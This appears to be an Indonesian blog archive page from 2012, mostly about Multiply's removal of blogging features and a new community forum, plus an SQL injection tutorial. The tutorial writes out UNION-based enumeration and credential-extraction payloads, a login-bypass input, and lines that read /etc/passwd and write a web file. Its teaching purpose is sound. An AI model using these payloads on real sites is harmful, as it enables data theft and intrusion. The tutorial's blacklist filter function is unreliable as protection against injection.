Tentang music ini memang menunjukkan keahlian dan kebersamaan otak mereka dalam mengolah nada. Bisa meningkatkan semangat dan adrenalin dalam bekerja.. Direkomendasikan buat yang sedang malas
Rabu, 08 Agustus 2012
SILAKAN KAPLING TEMPAT NGOBROL DULU
Saya ingin menawarkan pada teman-teman untuk tetap memiliki tempat bermain bersama. Saya tahu bahwa sementara memang saya belum bisa ikut andil banyak apalagi sampai membeli saham multiply hahahaha.. Namun setidaknya saya hari ini mensetup sebuah forum, yang sementara juga masih bersubdomain : http://forummp.bimosaurus.com. Insya Alloh besok akan segera berubah domain, memiliki domain sendiri. Tampilan forum masih sederhana, themes belum saya update, baru saja saya klik setup. Sehingga secara fungsi obrolan juga belum cukup bagus hari ini. Semoga besok kita sudah bisa ngobrol macam-macam di sana.
Untuk meregistrasi , rekans cukup mengklik http://forummp.bimosaurus.com/index.php?action=register. Hari ini baru saja terbentuk, sehingga saya belum sempat setting posting dan lain sebagainya. Namun bagi yang mau kapling nama, saya persilakan.
Nama yang akan dipilih untuk perkawanan kita yang baru belum akan saya ceritakan disini, sebelum saya konfirmasi domainnya. Katakan namanya adalah *******.com maka forum yang ada sekarang akan diletakkan pada oot.**********.com tersebut. Karena saya tahu, teman-teman hobi OOT. Dan kelak ketika web tersebut telah dapat digunakan, forum akan di disable dan akan dipindah ke situs yang memungkinkan teman teman berblogging. Tentu kita berharap, situs yang akan didevel akan mendekati Multiply buatan Pez. Sementara saya mengumpulkan beberapa literatur cms web dan pluggins yang mampu untuk didevel sedemikian. Mulai dari wordpress dengan fasilitas mutiuser, hingga kemungkinan adanya scratch coding.
Saya mengundang teman-teman yang memiliki kemampuan development web baik cms maupun scratch code, dan juga memiliki kemampuan desain grafis hingga css desain, untuk bergabung dalam pembicaraan di forum tersebut setelah kita setting nanti, agar setidaknya bisa membuat lebih efisien dan cepatnya proses desain dan devel. Saya sangat yakin kita memiliki sendiri situs perkawanan antara kita. Dan saya yakin blog yang ada di dalamnya akan memiliki kualitas yang tinggi, seperti teman-teman buat di MP. Saya tahu bahwa kemampuan saya tidak seberapa. Dan saya tahu apa yang saya lakukan belum bisa maksimal untuk teman semuanya. Namun setidaknya menjelang 1 Desember hari Kiamat MP rekan-rekan telah memiliki tempat obrolan lain yang lebih bebas tanpa takut diintip oleh orang yang kita anggap sebagai pihak yang pantas dilawan.
Saya tidak takut untuk ketahuan admin atau staff dalam posting ini,biar saja mereka tahu bahwa kita cukup serius dengan apa yang kita katakan : BERKAWAN!
Sekian, terimakasih, mohon maaf, dan mohon saran.. Dipisuhi ya monggo :D
[Bukan Sambungan] Ya BENER KITA GRATISAN.. TAPI
Ya benar... Multiply memang berfasilitas canggih... Sebelum social networking lain bisa edit gambar seperti rotating dll, MP sudah duluan.
Ya benar... penampilan gambar dan lain-lain di MP memang sip, itulah yang memancing orang jadi suka berjualan di MP. Itu juga yang memancing staf baru untuk membuat online shopping di MP
Ya benar... fasilitas logging, viewing history, faceboxes, dan segala notification inbox itu tampil dengan enak.
Ya benar... fasilitas download music pernah merajai dunia inet, sampai-sampai Multiply banyak tidak disarankan oleh Search Engines
Dan segudang "ya benar"
biasanya kata ini akan diikuti dengan "tapi"
Ya benar, akan diikuti dengan tapi
TAPI... bukan berarti kita berhak untuk digirang giring kemana-mana. Situs blog lain seperti wordpress, blogspot dan lain sebagainya justru menambah fasilitas. Ini, untuk kepentingan kapitalisme, segalanya digusur.
Ya benar, mereka berhak melakukan itu karena mereka yang punya. Dengan demikian, suatu saat mending minggat dari sini.
[masih posting] MENATA HATI dan HARAPAN bagi TEMAN-TEMAN
Saya bergabung dengan multiply di masa lalu karena fasilitas Blog dan Social Networkingnya. Saat itu masih ada almarhum Friendster yang sekarang beralih jadi situs Game. Saya tidak menyangka bahwa Multiply akan mengikuti langkah Friendster disaat masih digemari oleh para membernya.
Member MP termasuk amat setia dan militan. Mereka bisa hidup di dunia maya tanpa Facebook dan situs perkawanan sosial yang lain.
Tahun 2008 an fasilitas download musik dipersulit, kami masih sangat menerima dengan wajar. Tidak ada protes disana. Mulai dari link download yang hilang, hingga akhirnya benar-benar sulit. Kami mengeluh tapi kami tahu diri. Berikutnya, mulai ada Online Seller, dimana kami juga masih memandang wajar bahwa fitur multiply yang digemari para pembuka lapak Online adalah penyajian gambar disertai dengan Blog dan dapat dikomen yang membuat keadaan lebih ramah.
2011, diwarnai dengan take over id indonesia.multiply.com untuk keperluan profit para staf, dibukalah cabang Multiply di Indonesia. Dengan kisah Dart Vader dan SumitroGate yang dikenal teman-teman itu, kami pun protes keras yang diwarnai juga dengan pocong gate yang amat dibenci itu. Tak berapa lama kemudian kami mendengar bahwa Multiply akan berkantor pusat di Jakarta. Semua ini juga kami sadari bahwa kebutuhan operasional MP yang dulu 'mungkin' mepet dan akhirnya harus masuk ke ranah profit.
2012, pekan ini, sungguh-sunggu terjadi berita bahwa Fitur-fitur untuk blogger akan dihapus.. tapi entah apa yang berkembang dan setahu kami bahwa fitur blog dll tersebut masih akan ada untuk Online Seller. Kamipun sadar diri, ini free service yang menggiring kami menuju ke arah yang mereka inginkan.
Saya termasuk orang yang kaku. Sesuatu yang bersifat tidak sesuai dengan hati, saya akan protes dan berontak dengan yang saya bisa. Dengan hal yang kasar pun saya pernah melakukan. Namun jika pada akhirnya memang saya dipaksa untuk lebih tahu diri mengikuti aturan dan saya tidak setuju dengan aturan tersebut, saya benar-benar akan meninggalkan. Jangankan blogging. Urusan hidup nyata saja saya sudah sering resign dan desersi dari tempat kerja saya, hanya karena urusan ketidakcocokan kondisi. Jika bukan karena teman-teman dan kontak disini yang masih aktif bersama bercanda dan berdiskusi, tentu saya sudah cancel account tanpa perlu berpikir backup segala. Toh fitur canggih Multiply yang ada bukan karya orang-orang MP sekarang. Saya akui fitur yang ada cukup enak untuk bersocial networking. Seperti viewing history, Inbox, Video, proses menata halaman depan, penampilan Photos, music dan lain sebagainya. Meski itu juga akan musnah ditelan ketololan.
Ya, kita tunggu... kelak cerita tentang bencana Merapi, tentang dipertemukannya saya dengan teman-teman berkarakter, kisah-kisah pocong, dan lain sebagainya, benar-benar hanya akan menjadi cerita. Semoga masih sempat backup.. Sekali lagi sepertinya saya harus sadar diri, ketika protes tidak lagi didengar, maka sadar bahwa ini fasilitas juga numpang (meski banyak tumpangan lain yang juga gratis), maka, meski pemilik situs ini menggunakan cara idiot sekalipun, sepertinya lebih baik bagi saya untuk segera pergi. Cara paling enak mengikhlaskannya adalah dengan memahami bahwa para admin tak cukup pandai lagi mengelola super Social Net ini.
Tunggu cerita saya siang ini tentang sebuah ORKES SAKIT HATI dan sedikit harapan untuk teman-teman.. Lebih baik menyalakan lentera daripada sekedar mengutuki kegelapan..
tambahan-edit
Point lagi
Saya bukan tidak suka dengan OS atau menjadi OS. Sebesar-besar penghargaan saya pada teman-teman baik blogger maupun OS. Tapi dengan status kita digiring menjadi sesuatu entah OS atau apalah, jangan-jangan suatu ketika kita nurut saja disuruh menjadi member dengan status ANJING - justkidding - sesuai dengan keinginan mereka terhadap kita, untuk kepentingan kapitalis mereka.
BERSAMBUNG YA...
bimosaurus
9 Agustus 2012
Selasa, 07 Agustus 2012
Senin, 06 Agustus 2012
Minggu, 05 Agustus 2012
Mengurangi Resiko SQL Injection dengan Script Filter Parameter HTTP
Salah satu bug yang paling ditakuti di dunia pemrograman web adalah : SQL Injection Vulnerability. Dalam dunia hacking sering disebut dengan SQLiv. Bug ini termasuk paling banyak dijumpai publikasinya di situs-situs pempublish bug dan hacking. SQL Injection ini termasuk bug dengan jenis resiko tinggi. Injeksi SQL biasanya dilakukan dengan cara memasukkan perintah atau sintaks tambahan ke dalam FORM yang ada dalam web tersebut, baik FORM di address bar, maupun FORM yang ada pada content.
Dasar Teknis
1. Serangan GET Methode
Dalam membuat web, biasanya kita akan gunakan pemanggilan ID atau kode unik untuk mengundang suatu konten. Misal:
http://satuduatiga/index.php?mod=news&id=12
Kira-kira, proses SQL yang dibentuk adalah :
$id = $_GET['id'];
$query = "SELECT * FROM `news` WHERE `id`='$id'";
Apa yang terjadi apabila seseorang menambahkan perintah di belakangnya?
http://satuduatiga/index.php?mod=news&id=12 and 1=1
dan selanjutnya? Jika penambahan 1=1 dan 1=0 menghasilkan efek yang berbeda, dengan
1=1 posting/berita tetap muncul (tidak error)
1=0 berita tidak muncul (error)
Error message memang bisa saja ditutup dengan mengganti value PHP.INI dengan display_errors=’false’. Namun proses error tetap saja terjadi. Maka sebenarnya sintaks perintah di belakang parameter ID itu diproses oleh script. Berbahaya? Ya, sangat berbahaya. Biasanya penyusup akan menggunakan methoda UNION untuk melakukan serangan selanjutnya. Anggap dalam tabel berita bagian yang diambil adalah terdapat 4 kolom/field
SELECT `judul`,`isi`,`penulis`,`tanggal` FROM `news` WHERE `id`='$id'
Proses UNION adalah proses dua SELECT yang harus memiliki jumlah field terpanggil yang sama. Jika sampai proses UNION tidak sama jumlah fieldnya, maka akan terjadi error. Error adalah informasi berharga untuk seorang intruder. Misal si intruder mencoba melakukan pemanggilan sebagai berikut :
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1
maka halaman tersebut tidak akan muncul content. Maka dia bisa melanjutkan
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2
hingga
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,4
Pada saat itu, halaman selain menunjukkan posting content tersebut, juga akan menampilkan tulisan 1,2,3,4 sesuai dengan fieldnya. Saat itulah si intruder memanfaatkan seperti berikut:
Pencarian versi MySQL
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,@@version
Pencarian nama database yang aktif
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,database()
Pencarian nama user database aktif
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,user()
Pencarian nama database lain
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,(SELECT DISTINCT TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA not in('INFORMATION_SCHEMA','mysql','test') LIMIT 1)
Pencarian nama tabel untuk database ‘web’ misal
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,(SELECT TABLE_NAME from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA ='web' AND TABLE_NAME not in('coba','test','anu') LIMIT 1)
Pencarian nama kolom / field untuk tabel ‘user’ dalam database ‘web’ misal
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,(SELECT COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA ='web' AND TABLE_NAME ='user' AND COLUMN_NAME not in('test') LIMIT 1)
Pencarian data dalam kolom user atau password
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,(SELECT username FROM user LIMIT 1)
http://satuduatiga/index.php?mod=news&id=12 UNION SELECT 1,2,3,(SELECT password FROM user WHERE username='admin')
Setelah mendapatkan user dan password dari tabel user, maka dapat dieksekusi Login ke dalam form. Proses lain dapat juga dengan mencoba membaca file dalam sistem atau menulis file dalam sistem
SELECT load_file('/etc/passwd');
SELECT 'test' INTO OUTFILE('/var/www/hack.php');
atau bahkan
UPDATE news SET judul='hacked';
Cerita mengenai hacking dengan sql injection akan dibahas dalam posting lain.
2. Serangan POST Method
Serangan ini biasanya dilakukan pada FORM login.
Serangan ini biasanya memanfaatkan logika pemrograman sebagai berikut :
$username = $_GET['username'];
$password = $_GET['password']
$query = "SELECT * FROM `user` WHERE `username`='$username' AND `password`='$password'";
Logika ini benar, memanfaatkan operator logika AND. Sehingga session baru terbuka jika PASANGAN username dan password itu terdapat dalam tabel user.
Apa yang terjadi apabila kita memasukkan pada kolom login tersebut adalah : admin’ OR”=’ ? Maka proses query yang terjadi menjadi seperti ini
SELECT * FROM `user` WHERE `username`=’admin’ OR ”=’‘ AND `password`=”;
Bagian tercetak kuning merupakan masukan yang berasal dari form. Sedangkan proses logika AND menjadi tercemar oleh OR, sehingga password salahpun akan dianggap benar. Padahal jika logika tersebut benar, sessi akan terbuka untuk si penyusup, tanpa perlu tahu passwordnya.
3. Blind SQL Injection
Blind SQL Injection adalah SQL Injection tanpa petunjuk error atau penampilan yang jelas. Tetap Blind SQLiv ini BERBAHAYA.
Gejala-gejala
Melihat gejala sebuah situs mengidap penyakit ini adalah dengan beberapa cara:
- Menambahkan tanda petik. Jika pada halaman muncul error maka ada kemungkinan potensi bahaya itu ada.
- Menambahkan logika 1=1 dan 1=0. Jika dengan 1=1 berita masih muncul tapi 1=0 tidak muncul maka potensi itu ada
- Mencoba form login dengan memasukkan admin’ or ”=’pada kolom user dan password. Apakah anda dapat masuk ke halaman admin
- Memanfaatkan pentester software, seperti SQLMap, Hexjector ataupun Havij dan lain sebagainya.
Penanggulangan
Beberapa cara pengurang resiko bug ini adalah:
- Melakukan filtering parameter yang perlu dimasukkan sebagai proses SQL
- Melakukan penutupan error dan pembatasan jumlah karakter parameter/post
- Menggunakan user database dan password yang bukan root, dan beda aplikasi web seharusnya berbeda pula user dan grant nya
- Menata permission struktur direktori secara benar sehingga web tetap bisa melakukan penulisan, juga mysql tidak dapat menulis ke dalam file.
- Penggunaaan mod_rewrite apache untuk me-rewrite URL sehingga selain SEO Friendly juga aman.
- Melakukan sanitasi file upload dengan benar. Jika hanya dibutuhkan file gambar, maka hanya bertipe gambar saja yang boleh masuk.
- Penggunaan program semacam antivirus seperti clamav dan lain sebagainya.
- Penutupan database information_schema.
- Untuk penggunaan CMS, rajin update juga menjadi faktor penting. Namun kadang pluggins merupakan faktor yang sering membawa bug.
- Memanfaatkan log error dan access secara benar. Pengecekan apakah terjadi injection dapat dimulai dari sini.
dan lain sebagainya.
Contoh Script Filter Parameter sederhana:
function filter_param($text,$html=true){
$e_s=array('\\','\'','"');
$d_s=array('','','');
$text = preg_replace( "'<script[^>]*>.*?</script>'si", '', $text );
$text = preg_replace( '/<a\s+.*?href="([^"]+)"[^>]*>([^<]+)<\/a>/is', '\2 (\1)', $text );
$text = preg_replace( '/<!--.+?-->/', '', $text );
$text = preg_replace( '/{.+?}/', '', $text );
$text = preg_replace( '/ /', ' ', $text );
$text = preg_replace( '/&/', '', $text );
$text = str_replace( $e_s, $d_s, $text );
$text = strip_tags( $text );
$text = preg_replace("/\r\n\r\n\r\n+/", " ", $text);
$text = $html ? htmlspecialchars( $text ) : $text;
return $text;
}
$id = filter_param($_GET['id']);
$username = filter_param($_POST['username']);
$password = filter_param($_POST['password']);
SQL Injection dapat terjadi pada semua jenis database. Oracle, SQLServer, Access dan lain-lain. Pada windows, SQL Server juga memiliki fungsi executable yang cukup berbahaya.
Tulisan ini sekedar sharing, tidak bermaksud menggurui, mengingat juga bahwa masih banyak bug yang terdapat pada produk yang dibuat oleh penulis. Semoga bermanfaat
Dia tidak lengkap, tapi mengalahkan yang lengkap!
Berita ini berhasil membuat malu saya
Sabtu, 04 Agustus 2012
Kamis, 02 Agustus 2012
Pencuri Diperkosa Calon Korbannya - Yahoo! News Indonesia
jan, maling e ra mutu.. bukannya seneng malah lapor.. hahahahaa
Rabu, 01 Agustus 2012
Urun Gambar : Melepas Rindu Selo
Pasca sowan dari rekan-rekan begawan www.bengawan.org di daerah Solo 31 Juli 2012, saya memutuskan pulang lewat Selo, tembus Blabak Magelang via Boyolali Cepogo..
Masih beraura seperti dulu meski banyak berubah.. Merapi memang mempesona. Merapi adalah gunung pelarian jika saya sedang mumet. Pendakian paling aman ya lewat Selo, disamping kadang kalau lebih mumet lagi, dicoba lewat Bebeng/Kinahrejo tempat mbah Marijan.
Hampir seluruh pendakian Merapi saya ingat hingga ke tanggal-tanggalnya. Terutama pendakian menjelang erupsi 1998, dan erupsi 2001 dimana tanpa rencana seorang yang sedang patah hati ditolak cintanya memilih jalan tersesat di Merapi.
Untuk Selo, saya masih merindukan tempat ini. Setidaknya untuk thongkrong-thongkrong dan kelak membawa keluarga bermain-main ke sini, entah ke Merbabu atau ke Merapi.. Sukur kalau ada yang memperbolehkan mendaki kekekekek...